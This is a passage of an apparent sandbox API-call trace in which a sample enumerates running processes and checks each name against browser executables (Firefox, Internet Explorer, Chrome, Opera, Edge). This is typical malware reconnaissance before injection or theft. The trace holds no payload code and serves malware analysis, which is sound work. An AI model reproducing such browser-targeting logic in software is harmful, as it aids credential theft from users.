cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.718] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0215.718] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0215.718] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0215.718] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0215.718] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.718] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0215.718] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0215.718] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0215.718] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0215.718] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.719] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0215.719] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0215.719] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0215.719] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0215.719] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.719] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.719] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.719] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.719] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.719] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.720] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.720] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.720] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.720] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.720] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.720] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.721] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.722] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.722] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.722] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.722] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.722] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.722] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.722] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0215.722] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0215.722] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0215.723] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0215.723] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.723] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.723] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.723] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.723] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.723] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.724] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.724] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.724] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.724] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.724] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.724] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.724] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0215.724] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0215.724] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0215.724] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0215.724] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.724] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.725] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0215.725] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0215.725] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0215.725] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0215.725] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.725] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.726] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0215.726] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0215.726] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0215.726] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0215.726] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.726] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.726] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.726] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.726] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.726] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.726] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.726] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.727] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0215.727] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0215.727] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0215.727] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0215.727] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.727] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0215.728] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0215.728] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0215.728] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0215.728] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0215.728] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.728] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0215.728] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0215.728] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0215.728] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0215.728] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0215.728] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.728] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0215.729] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0215.729] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0215.729] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0215.729] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0215.729] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0215.729] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0215.729] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0215.729] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0215.729] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0215.730] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0215.730] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0215.730] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0215.730] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0215.730] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0215.730] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0215.731] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0215.731] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0215.731] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0215.731] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0215.731] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0215.731] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0215.731] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0215.731] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0215.731] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0215.731] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0215.732] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0215.732] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0215.732] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0215.732] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0215.732] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0215.733] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0215.733] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0215.733] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0215.733] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0215.733] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.733] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0215.733] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0215.733] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0215.733] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0215.733] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0215.733] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.733] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0215.734] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0215.734] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0215.734] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0215.734] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0215.734] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.734] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0215.734] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0215.734] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0215.734] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0215.734] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0215.734] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0215.735] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0215.735] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0215.735] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0215.735] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0215.735] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0215.736] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0215.736] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0215.736] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0215.736] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0215.736] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0215.736] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0215.736] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0215.736] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0215.736] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0215.736] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0215.737] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0215.737] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0215.737] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0215.737] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0215.737] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0215.738] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0215.738] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0215.738] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0215.738] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0215.738] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.738] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0215.738] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0215.738] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0215.738] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0215.738] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0215.738] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.738] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0215.739] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0215.739] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0215.739] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0215.739] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0215.739] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.739] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0215.739] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0215.739] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0215.740] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0215.740] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0215.740] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0215.740] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0215.740] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0215.740] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0215.740] lstrcmpiA 